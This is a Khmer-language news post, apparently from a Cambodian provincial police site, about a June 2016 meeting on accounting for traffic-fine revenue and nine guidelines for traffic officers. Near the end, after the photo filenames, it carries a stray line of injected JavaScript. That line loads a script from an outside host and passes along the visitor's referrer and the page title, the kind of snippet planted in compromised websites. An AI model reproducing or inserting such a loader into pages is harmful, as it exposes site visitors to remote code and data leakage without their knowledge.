ព្រឹតិ្តការណ៍ថ្មីៗ

ស្នងការដ្ឋាននគរបាលខេត្តកំពង់ចាមបានរៀបចំពិធីប្រជុំស្តីពីការបង្កេីតម្ចាស់គណនី គ្រប់គ្រងប្រាក់ចរាចរណ៍

2 ឆ្នាំ មុន 1 តូ សុផល

ខេត្តកំពង់ចាម៖ នាព្រឹកថ្ងៃទី៣ ខែមិថុនា ឆ្នាំ២០១៦នៅសាលប្រជុំជាន់លេីនៃស្នងការដ្ឋាននគរបាលខេត្ត កំពង់ចាមបានរៀបចំពិធីប្រជុំស្តីពីការបង្កេីតម្ចាស់គណនី គ្រប់គ្រងប្រាក់ចរាចរណ៍និងភ្នាក់ងារគ្រប់គ្រងប្រាក់ចំណូលពិន័យអន្តរការណ៍ចំពោះអំពេីល្មេីសនិងច្បាប់ចរាចរណ៍ផ្លូវគោក។ក្រោមអធិបតីភាព លោកឧត្តមសេនីយ៍ទោ បែន រ័ត្ន ស្នងការនគរបាលខេត្តកំពង់ចាមនិងដោយមានការចូលរួមពី លោកស្នងការរងទទួលផែនភស្តុភារ លោកស្នងការរងទទួលផែនសណ្តាប់ធ្នាប់ លោកនាយការិយាល័យចរាចរណ៍ជេីងគោក លោកនាយការិយាល័យភស្តុភារ លោកអធិការ អធិការរងទទួលផែនសណ្តាប់ធ្នាប់និងទទួលផែនសេនាធិការក្រុង ស្រុកទាំង១០និងមន្រ្តីទទួលការងារគណនេយ្យសមាសភាពចូលរួមសរុប៥៨នាក់។ជាកិច្ចចាប់ផ្តេីមលោកឧត្តមសេនីយ៍ស្នងការបានពន្យល់ពីបញ្ហាការធ្វេីតារាងបញ្ជីគណនេយ្យនិងសេចក្តីសម្រេចសំខាន់ៗមានៈ
-យោងតាមសេចក្តីណែនាំលេខ០០៩ សណនចុះថ្ងៃទី០៣ ខែឧសភា ឆ្នាំ២០១៦ស្តីពីវិធានការគ្រប់គ្រងនិងការ បែងចែកប្រាក់ចំណូលពីការពិន័យអន្តរការណ៍ចំពោះបទល្មេីស នឹងច្បាប់ចរាចរណ៍ផ្លូវគោករបស់សម្តេចក្រឡា ហោម ឧបនាយករដ្ឋមន្ត្រីក្រសួងមហាផ្ទៃ។
-សេចក្តីណែនាំលេខ ០០៧ សណនចុះថ្ងៃទី០៦ ខែឧសភា ឆ្នាំ២០១៦ ស្តីពីការជម្រុញអនុវត្តន៍សេចក្តីណែនាំលេខ ០០៩ សណន របស់ក្រសួងមាហាផ្ទៃ ស្តីពីវិធានការគ្រប់គ្រងនិងបែងចែកប្រាក់ចំណូលពីការផាកពិន័យអន្តរការណ៍ចំពោះអំពេីល្មេីសនិងច្បាប់ស្តីពីចរាចរណ៍ផ្លូវគោករបស់អគ្គស្នងការនគរបាលជាតិ។
ដេីម្បីធានាការគ្រប់គ្រងនិងបែងចែកប្រាក់ចំណូលពី
ការផាកអន្តរការណ៍ចំពោះអំពេីល្មេីសនឹងច្បាប់ចរាចរណ៍ផ្លូវគោក ប្រកបដោយគណនេយ្យភាព ស្របតាម
នីតិវិធីហិរញ្ញវត្ថុនិងធានាអោយការការបែងចែកប្រាក់រង្វាន់លេីកទឹកចិត្តប្រកបដោយសមធម៌និងមានតម្លាភាព ។
លោកឧត្តមសេនីយ៍ស្នងការបានណែនាំដល់នគរបាលចរាចរណ៍អោយអនុវត្តន៍តាមគោលការណ៍៩ ចំណុចរួមមានៈ
១.បន្តផ្សព្វផ្សាយច្បាប់ចរាចរណ៍ផ្លូវគោក
២.បន្តការរឹតបន្តឹងត្រួតពិនិត្យច្បាប់អោយបានជាប់លាប់ទាំងយប់ទាំងថ្ងៃ
៣.បន្តជម្រុញអនុកម្មការសុវត្ថិភាពចរាចរណ៍ផ្លូវគោក ខេត្ត
៤.ស្រាវជ្រាវវិធានការគ្រប់គ្រងភូមិ ឃុំអោយមាន
លក្ខណៈបច្ចេកទេសមានសុវត្ថិភាពនិង វិធានការ
ពិសេសដេីម្បីគ្រប់គ្រងអ្នកប្រេីប្រាស់ ម៉ូតូក្រោម១២៥សេសេ
៥.បន្តរសិក្សាបំពាក់ឧបករណ៍បច្ចេកទេសត្រួត ពិនិ្យល្បឿន គ្រឿងស្រវឹង បង្កេីនសមត្ថិភាពមន្ត្រី
៦.ជំរុញការបំពាក់ផ្លាក់សញ្ញាចរាចរណ៍និងដោះស្រាយការកកស្ទះ
៧.បន្តធ្វេីវិសោធនកម្មច្បាប់ស្តីពីចរាចរណ៍ផ្លូវគោកនិងតាក់តែងបទដ្ឋាននានា
៨.បន្តពង្រឹងយុន្ធការណ៍តាមដានប្រតិកម្មរបស់សាធារណៈជនដេីម្បីឆ្លេីយតបអោយទាន់ពេលវេលា
៩.អនុវត្តន៍ទិសដៅតាមស្មារតីប្រជំុថ្ងៃទី០២ ខែមិថុនា ឆ្នាំ២០១៦ ។
ជាចុងក្រោយលោកឧត្តមសេនីយ៍ស្នងការបានណែនាំដល់មន្រ្តីអនុវត្តន៍ច្បាប់ចរាចរណ៍គ្រប់គោលដៅទាំងអស់ត្រូវមានសុជីវធម៌ក្នុងការនិយាយស្តីទៅកាន់បងប្អូនប្រជាពលរដ្ឋនិងមានភាពទន់ភ្លន់តែមឺុងម៉ាត់ក្នុងការងារហេីយខិខំបំពេញភារកិច្ចរបស់ខ្លួនអោយបានល្អនិងបម្រេីប្រជាពលរដ្ឋអោយអស់ពីកម្លាំងកាយចិត្តនិង
គោរពច្បាប់ចរាចរណ៍ទាំងអស់គ្នាដេីម្បីការពារជីវិតយេីងនិងអ្នកដ៏ទៃ៕

អត្ថបទៈក្រុមផ្សព្វផ្សាយ
រូបភាពៈក្រុមផ្សព្វផ្សាយ

13239073_635268949962144_2978472190976953147_n 13315771_635269073295465_5688413504683810119_n 13319802_635269123295460_9040582013318530677_n 13321726_635268816628824_8947191727881815685_n 13322027_635268916628814_410931287243876512_n 13335654_635269013295471_4447990122836302338_n 13339589_635268873295485_1588105401562126337_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ